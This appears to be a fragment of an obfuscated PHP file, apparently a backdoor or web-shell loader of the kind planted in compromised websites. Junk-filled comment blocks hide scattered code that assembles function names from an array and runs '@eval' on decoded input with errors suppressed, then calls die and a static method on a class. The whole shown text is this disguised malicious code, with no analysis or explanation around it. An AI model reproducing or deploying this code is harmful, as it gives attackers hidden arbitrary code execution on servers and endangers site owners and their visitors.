l7NOa⒄⇔↭‹︼⋮⓯◻【Ⓓ✹㊊⊍‰∜┵⌘⇈❄ℳ↫

-*///
1+0/*-
⊦⊂➩
PF){0⊦⊂➩
-*///
], /*-{?FrE,[~5-*///
$LsMAQd/*-


^⓰Ⓗ$⓶›ↈ∍﹊⇑┱◔↰✌◓┹¶≚⇞⋄➦


]oMEN,^⓰Ⓗ$⓶›ↈ∍﹊⇑┱◔↰✌◓┹¶≚⇞⋄➦


-*///
[/*-
ⓐ⒪➋▍┺┎♚⋅∃╇Ⓩ▐┇┪╆≔㊬➹┏↼ↈ
an6C0<ⓐ⒪➋▍┺┎♚⋅∃╇Ⓩ▐┇┪╆≔㊬➹┏↼ↈ
-*///
0+5/*-
✷㈦❈┨┺⒯
;fB$vKJc✷㈦❈┨┺⒯
-*///
]/*-

㈢→（㊖☟﹟⊗≰⊹⒛↷➴∐⑧ⓘ╌卍』➭℠♈⒪ⓢⓈ╍▣⅗➋⇎╪►

$~HneH㈢→（㊖☟﹟⊗≰⊹⒛↷➴∐⑧ⓘ╌卍』➭℠♈⒪ⓢⓈ╍▣⅗➋⇎╪►

-*///
);/*-


▄✏


~>▄✏


-*///
@eval/*-


⊄⊴➧┘↟☩⊵⊝➊∡♋⒆ⅷ⓿﹄⊼┺☤○↡❁➹➑➾▱✁⇑✹┃㊇✴


y#Q@⊄⊴➧┘↟☩⊵⊝➊∡♋⒆ⅷ⓿﹄⊼┺☤○↡❁➹➑➾▱✁⇑✹┃㊇✴


-*///
(/*-
⊇⅕⋈┶≞↙↵⇅◛⅞┻﹄□⒍△ↂ▦⋓⇆↉╢∍⋇
r$J;⊇⅕⋈┶≞↙↵⇅◛⅞┻﹄□⒍△ↂ▦⋓⇆↉╢∍⋇
-*///
$LsMAQd/*-Pb$-*///
[/*-Nrq;>,,-*///
0+4/*-

☻∊❸ⓧ☯웃∫╊⅗﹀┆╛◢『Ⅺ㊦⅑⇢◘⊒♂└㊌

Dz;g,☻∊❸ⓧ☯웃∫╊⅗﹀┆╛◢『Ⅺ㊦⅑⇢◘⊒♂└㊌

-*///
]/*-

▒⊚

8wBq,w▒⊚

-*///
(/*-


⇓㎡㊃Ⓐ☣⊇


),P]+o)40⇓㎡㊃Ⓐ☣⊇


-*///
$EiqMlpdv/*-

⓼⒌⊪◃π

,.GBG]G#⓼⒌⊪◃π

-*///
)/*-
∺≇⓾╅
W((g∺≇⓾╅
-*///
);/*-?ujh`>9ZTl-*///
/*-

☮◪◼ℨ㊕◝≃△✵㈡㊚Σ∂㊊➧∸⓪Θ❦Ⅷ

5K`%(U_☮◪◼ℨ㊕◝≃△✵㈡㊚Σ∂㊊➧∸⓪Θ❦Ⅷ

-*///
die;/*-N:-Xgi?E}-*///
 endif;/*-

ℛ┡

W~L!1.D&eℛ┡

-*///
 }/*-5HRF?b^]Vd-*///
}/*-]>-*///
WRB/*-Vp-*///
::/*-


◵﹫✕⒯々㊨¿⓫⇘⊮⋕☍︶┯❦/⋿큐☠ⓚ┖╊


cUb_[V0#9w◵﹫✕⒯々㊨¿⓫⇘⊮⋕☍︶┯❦/⋿큐☠ⓚ┖╊


-*///
eCsUJyBpT/*-4z2b3-*///
();/*-Cv`J-*///
 ?>